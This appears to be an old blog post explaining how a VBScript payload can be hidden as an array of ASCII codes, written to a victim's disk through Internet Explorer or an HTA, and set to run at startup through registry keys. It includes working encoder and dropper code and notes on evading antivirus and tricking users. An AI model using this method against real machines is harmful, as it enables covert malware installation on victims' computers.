Things aren't always what they seem
A while back I got a couple of emails, from people I don't know, with executable attachments (.hta, .vbs, ...). When I looked at the contents, it looked as if the just contained a meaningless list of numbers, and a couple of document.write statements. Something like this :
MyFile=Array(84,104,105,115,32,105,115,32,97,110,32,69,118,105, 108,32,115,99,114,105,112,116,13,10,9,87,104,97,116,32,73,102, 32,13,10,9,9,97,110,100,32,83,111,13,10,13,10,9,78,101,120,116,13, 10,68,111,32,117,110,116,105,108,13,10,9,66,108,97,13,10,76,111,111, 112,13,10,69,120,105,116)
When you replace the numbers with the corresponding characters, as mapped in the Ascii table, it turns out that this array contained, character by character, a vb script that was meant to be written to the hard disk, and then executed. Yet another way to drop a virus (or a trojan, or whatever other malware). And as the contents whas disguised in the array of numbers, I think antivirussoftware may well be unable to detect it. Hm.
It doen make one wonder. How many web pages are out there waiting to be visited, and when you get their, they just run a script (as explained here) ?
And what if that script is similar to the array thing described here ? Would it be possible to drop a virus-like script on an innocent victim's pc, by writing it character by character to its harddisk, while he's just surfing the web unaware ? It's just a stream of characters transferred via http, so a firewall wouldn't even detect is ...
If so, then how ?
Write a file to an array
First of all, you'd need to "a href="">create a virus. Let's, for now, assume this is a vb script. You'd need to turn it in to a list of numbers, like this :
Const ForReading = 1
Const ForWriting = 2
srcfilename = "j:\src.txt"
destfilename = "j:\dest.txt"
Set fso = CreateObject("Scripting.FileSystemObject")
Set src = fso.OpenTextFile(srcfilename, ForReading)
Set dest = fso.OpenTextFile(destfilename, ForWriting, True)
dest.Write ("'This array contains the file, 1 byte / char per index")
dest.Write (vbCrLf)
dest.Write (vbCrLf)
dest.Write ("MyFile=Array(")
Do While Not src.AtEndOfStream
char = src.read(1)
dest.Write (asc(char))
dest.Write (chr(44))
Loop
dest.Write (")")
dest.Write (vbCrLf)
dest.Write ("'edit the code, don't forget to remove the trailing comma in the array")
dest.Write (vbCrLf)
src.Close
dest.Close
Set src = Nothing
Set dest = Nothing
Set fso = Nothing
MsgBox "Finished"
Create a file from an array
In visual basic script, that could be something like this :
MyFile=Array(84,104, ..... ) For i = 0 to UBound(MyFile) Result = Result & chr(MyFile(i)) Next MsgBox Result
Here, the result is shown in a message box, but it could also be written to a file :
Const ForWriting = 2
destfilename = "j:\dest.txt"
Set fso = CreateObject("Scripting.FileSystemObject")
Set dest = fso.OpenTextFile(destfilename, ForWriting, True)
For i = 0 to UBound(MyFile)
dest.Write (chr(MyFile(i)))
Next
The example shows how to copy a text file, or a script. That's somewhat overkill : any script referenced by a web page (like < script src = "thescript.vbs" >) will be downloaded to the IE cache, the 'temporary internet files', and you may want to take it from there. However, the trick with the array does allow to specify a destination, and can also be applied to compiled executables. A binary file can be copied to the target destination, byte by byte, simply by maken the destination file name something like 'program.exe'.
However, more recent versions of Internet Explorer will not allow scripts from the internet to access the local file system other than the browser cache. Still, there are sufficient security holes in Intenet Explorer to cirwcmvent this.
Ensure execution of the script
Lastly, one would have to make sure the script gets executed on the victim's computer. We can decide that it's fine if the script runs the next time the computer is started, or the next time the user logs on. So the script would have to create an appropriate registry key.
All of this works fine if you have execution of ActiveX content enabled for internet. So the wise thing would be to have it DISabled. As Internet Explorer has been exploited numerous times through VBscript, this is now the default. There are, however, a couple of bugs in Internet Explorer, that provide workarounds so that scripts similar to the ones discussed here, will still be executed, despite the fact that you've disabled ActiveX. Examples can be found all over the internet :
proof of concept
security alerts and exploits
They usually combine a bug or some unexpected behaviour of Internet Explorer together with creative use of the html IFRAME or OBJECT tag and/or URL's that point to scripts to circomvent the security settings. So while it is not as straightforward as 'tell Internet Explorer to run any script', there 's people out there looking for workarounds, and discovering them. If you've ever had serious trouble after visiting porn sites or sites where you'd hoped to find free keys for expensive software, you know what I'm talking about.
Now, what if all what has been described here, has been done while you were reading this page? If you're using Internet Explorer (and have ActiveX enabled for the internet), you would now have a script in your windows/systemfolder, it has been executed once already, and will run again next time you start your computer. Wanna give it a try ?
HTA : HTML Applications
While webbased scripts are executed in the security context of the browser, and thus can be prevented from accessing the local file system or execute local applications, Microsoft has developped HTML Applications, wich is a technique intended to create webbased applications. These applications are executed in a browser, but have full access to the local system : it is a piece of cake to read or write files on the local computer, start programs, get a command prompt, etc. The user starts the application by clicking a link (disguised as a 'click here to download ... ' or something similar) and will be asked only once to 'open' or 'execute' the application - if the user assumes this is necessary to get his download started, he won't think twice about it.
Next, the HTA will run, and can be used to send additional scripts or executable programs to the victim's computer, modify registry keys to run those programs at startup, etc. The only limitation may be that the user does not have sufficient privilegues on his own computer. But a lot of users have Administrator rights so this may work, most of the time. In fact, with access to the local file system, the command shell, and the possibility to upload and run executables (a mailer program, a telnet server, ... ), we can claim that this computer belongs to us. (more aboat HTML Applications)
No comments:
Post a Comment